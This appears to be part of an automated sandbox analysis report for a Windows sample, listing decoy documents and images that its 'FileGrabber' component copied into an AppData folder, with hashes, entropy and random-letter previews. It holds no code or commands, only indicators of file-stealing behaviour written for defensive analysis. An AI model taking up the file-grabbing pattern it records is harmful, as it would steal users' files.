SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\YPSIACHYXW.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
